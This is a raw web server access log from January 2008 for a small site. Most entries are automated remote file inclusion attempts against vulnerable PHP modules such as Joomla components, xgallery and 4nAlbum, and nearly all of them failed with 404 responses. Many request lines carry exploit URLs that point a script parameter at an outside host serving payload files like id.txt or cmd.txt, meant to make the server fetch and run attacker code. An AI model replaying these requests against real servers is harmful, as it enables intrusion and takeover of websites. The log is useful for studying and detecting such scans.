201.130.79.43 - - [22/Jan/2008:06:56:43 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.88.242 - - [22/Jan/2008:06:56:43 -0800] "GET ///amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.sajin88.com/bbs/code/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:06:56:48 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:06:56:53 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.34 - - [22/Jan/2008:07:01:04 -0800] "GET /tmp/sess_b6279367c8b69e95bdfb12651e63da55 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:07:01:14 -0800] "GET /logs/access_071224.log//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:07:01:14 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:07:01:15 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:01:30 -0800] "GET /logs/access_071222.log/database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:01:31 -0800] "GET /database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:01:31 -0800] "GET /logs/database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.137 - - [22/Jan/2008:07:01:36 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:03:04 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:03:05 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:03:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:07:03:06 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:07:03:06 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:07:03:06 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:03:12 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:03:54 -0800] "GET /logs/access_071228.log/modules/My_eGallery/index.php?basepath=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:07:07:02 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:07:07:07 -0800] "GET /logs/access.log/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:07:07:07 -0800] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.72.117.141 - - [22/Jan/2008:07:07:07 -0800] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.131.106.11 - - [22/Jan/2008:07:07:43 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.dmulk.com"
88.131.106.11 - - [22/Jan/2008:07:07:43 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.dmulk.com"
62.75.177.136 - - [22/Jan/2008:07:07:45 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.75.177.136 - - [22/Jan/2008:07:07:45 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.8.124 - - [22/Jan/2008:07:07:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.124 - - [22/Jan/2008:07:07:52 -0800] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:07:09:08 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [22/Jan/2008:07:09:26 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.61.135.106 - - [22/Jan/2008:07:10:15 -0800] "GET /logs/access_071230.log/modules/TotalCalendar/about.php?inc_dir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.61.135.106 - - [22/Jan/2008:07:10:16 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.61.135.106 - - [22/Jan/2008:07:10:20 -0800] "GET /logs/access_071225.log/modules/TotalCalendar/about.php?inc_dir=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.8.154.215 - - [22/Jan/2008:07:11:08 -0800] "GET //administrator/components/com_jreactions/load.php?comPath=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:07:14:28 -0800] "GET /minamijewelry/html/images/jewelry/B5t.jpg HTTP/1.0" 200 3859 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:07:14:29 -0800] "GET /minamijewelry/html/images/jewelry/B2.jpg HTTP/1.0" 200 55806 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:07:14:37 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:07:16:31 -0800] "GET /minamijewelry/html/images/jewelry/B1t.jpg HTTP/1.0" 200 2616 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [22/Jan/2008:07:16:31 -0800] "GET /minamijewelry/html/images/jewelry/B3t.jpg HTTP/1.0" 200 2904 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
213.8.154.215 - - [22/Jan/2008:07:20:38 -0800] "GET /logs/access_071212.log//administrator/components/com_jreactions/load.php?comPath=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [22/Jan/2008:07:20:39 -0800] "GET /logs//administrator/components/com_jreactions/load.php?comPath=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.8.154.215 - - [22/Jan/2008:07:22:08 -0800] "GET /logs/access_071225.log//administrator/components/com_jreactions/load.php?comPath=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:07:24:53 -0800] "GET /logs/access.log//includes/settings.inc.php?include_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:07:24:58 -0800] "GET //includes/settings.inc.php?include_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.43 - - [22/Jan/2008:07:25:03 -0800] "GET /logs//includes/settings.inc.php?include_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:07:25:59 -0800] "GET /logs/access_071229.log/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:07:26:00 -0800] "GET /nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.2.141 - - [22/Jan/2008:07:26:00 -0800] "GET /logs/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:27:08 -0800] "GET /logs/access.log/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:27:09 -0800] "GET /nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:27:09 -0800] "GET /logs/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:07:27:10 -0800] "GET /logs/access_071222.log/database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:07:27:10 -0800] "GET /database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.109.146 - - [22/Jan/2008:07:27:11 -0800] "GET /logs/database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.6.28.26 - - [22/Jan/2008:07:31:19 -0800] "GET /logs/access_070630.log HTTP/1.0" 200 36187 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:07:32:22 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:33:44 -0800] "GET /logs/access_071228.log/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:34:10 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:34:12 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:34:13 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:37:58 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:37:58 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:37:59 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:07:38:26 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:07:38:31 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:07:38:32 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:07:38:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:07:41:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:07:41:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.98.246.16 - - [22/Jan/2008:07:41:47 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
146.83.237.67 - - [22/Jan/2008:07:42:12 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:07:45:02 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:07:45:07 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:07:45:18 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.114.5 - - [22/Jan/2008:07:47:41 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [22/Jan/2008:07:47:42 -0800] "GET //skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.114.5 - - [22/Jan/2008:07:47:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:48:56 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:48:56 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:48:58 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.129.109 - - [22/Jan/2008:07:49:19 -0800] "GET /logs//index.php?abs_path=http://rise.dk/cache/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.114.129.109 - - [22/Jan/2008:07:49:20 -0800] "GET //index.php?abs_path=http://rise.dk/cache/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.53.114.5 - - [22/Jan/2008:07:49:59 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:07:53:13 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:07:53:14 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:07:53:14 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [22/Jan/2008:07:53:36 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:07:54:39 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.129.109 - - [22/Jan/2008:07:58:55 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://rise.dk/cache/id2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
85.114.129.109 - - [22/Jan/2008:07:58:59 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://rise.dk/cache/id2.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:59:55 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:59:55 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:07:59:56 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.3.251 - - [22/Jan/2008:08:01:44 -0800] "GET //skin/zero_vote/error.php?dir=http://www.prumoengenharia.com.br/.httpdocs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [22/Jan/2008:08:01:59 -0800] "GET //skin/zero_vote/error.php?dir=http://www.prumoengenharia.com.br/.httpdocs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.53.114.5 - - [22/Jan/2008:08:04:43 -0800] "GET //skin/zero_vote/error.php?dir=http://www.arabx1st.xpgplus.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
146.83.237.67 - - [22/Jan/2008:08:04:52 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
146.83.237.67 - - [22/Jan/2008:08:04:52 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.n0n-clan.net/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:08:05:12 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:08:05:12 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:08:05:13 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:08:07:11 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:08:07:11 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:08:07:12 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [22/Jan/2008:08:07:13 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:08:07:25 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.41.206 - - [22/Jan/2008:08:07:34 -0800] "GET //event.php?myevent_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.103.8.225 - - [22/Jan/2008:08:08:15 -0800] "GET /logs/access.log/index.php?redir=http://203.197.248.118:1971/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [22/Jan/2008:08:08:16 -0800] "GET /index.php?redir=http://203.197.248.118:1971/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [22/Jan/2008:08:08:16 -0800] "GET /logs/index.php?redir=http://203.197.248.118:1971/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:08:10:24 -0800] "GET /logs/access.log/include_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:08:10:25 -0800] "GET /logs/access.log/include_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:08:10:25 -0800] "GET /include_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:08:10:25 -0800] "GET /include_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:08:10:26 -0800] "GET /logs/include_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:08:10:26 -0800] "GET /logs/include_path=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.103.8.225 - - [22/Jan/2008:08:11:17 -0800] "GET /logs/access_080101.log/index.php?redir=http://203.197.248.118:1971/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
